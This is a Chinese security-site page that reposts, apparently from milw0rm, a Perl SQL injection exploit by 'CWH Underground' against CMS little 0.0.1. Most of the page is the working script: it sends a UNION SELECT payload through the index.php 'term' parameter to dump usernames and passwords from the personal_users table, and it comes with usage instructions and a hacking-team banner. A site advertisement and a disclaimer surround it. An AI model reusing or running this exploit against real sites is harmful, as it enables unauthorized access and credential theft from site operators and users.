为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

CMS little (index.php term) Remote SQL Injection Exploit

2009-6-4 11:25| 投稿: security

摘要: 摘自 milw0rm.com#!/usr/bin/perl -w#==========================================================#...
摘自 milw0rm.com#!/usr/bin/perl -w#==========================================================# CMS little (index.php term) Remote SQL Injection Exploit#==========================================================##  ,--^----------,--------,-----,-------^--,#  | |||||||||   `--------'     |          O        .. CWH Underground Hacking Team ..#  `+---------------------------^----------|#    `\_,-------, _________________________|#      / XXXXXX /`|     /#     / XXXXXX /  `\   /#    / XXXXXX /\______(#   / XXXXXX /           #  / XXXXXX /# (________(             #  `------'##AUTHOR : CWH Underground#DATE : 28 November 2008#SITE : cwh.citec.us########################################################APPLICATION : CMS little#VERSION     : 0.0.1#DOWNLOAD    : http://downloads.sourceforge.net/littlecms/CMSLite.zip########################################################Note: magic_quotes_gpc = off#########################################################################################Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK#Special Thx : asylu3, str0ke, citec.us, milw0rm.com####################################################################################### use LWP::UserAgent;use HTTP::Request; if ($#ARGV+1 != 2){   print "\n==============================================\n";   print "    CMS little Remote SQL Injection Exploit   \n";   print "                                              \n";   print "        Discovered By CWH Underground         \n";   print "==============================================\n";   print "                                              \n";   print "  ,--^----------,--------,-----,-------^--,   \n";   print "  | |||||||||   `--------'     |          O        \n";   print "  `+---------------------------^----------|   \n";   print "    `\_,-------, _________________________|   \n";   print "      / XXXXXX /`|     /                      \n";   print "     / XXXXXX /  `\   /                       \n";   print "    / XXXXXX /\______(                        \n";   print "   / XXXXXX /                                 \n";   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";   print " (________(                                   \n";   print "  `------'                                    \n";   print "                                              \n";    print "Usage  : ./xpl.pl <Target> <Data Limit>\n";   print "Example: ./xpl.pl http://www.target.com/cmslite 10\n";   exit();} $target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];$number = $ARGV[1]; print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";print "\n[+]Dump Username and Password\n"; for ($start=0;$start<$number;$start++) { $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";$req = HTTP::Request->new(GET => $target."/index.php?term=a%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,name,0x3a3a,password,0x3a3a3a),3,4,5,6,7,8,9,10,11,12%20from%20personal_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";$res = $xpl->request($req);$info = $res->content;$count=$start+1; if ($info =~ /:::(.+):::/){$dump=$1;($username,$password)= split('::',$dump);printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";}else {         print "\n Exploit Done !!" or die "\n Exploit Failed !!\n";        exit;}  

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部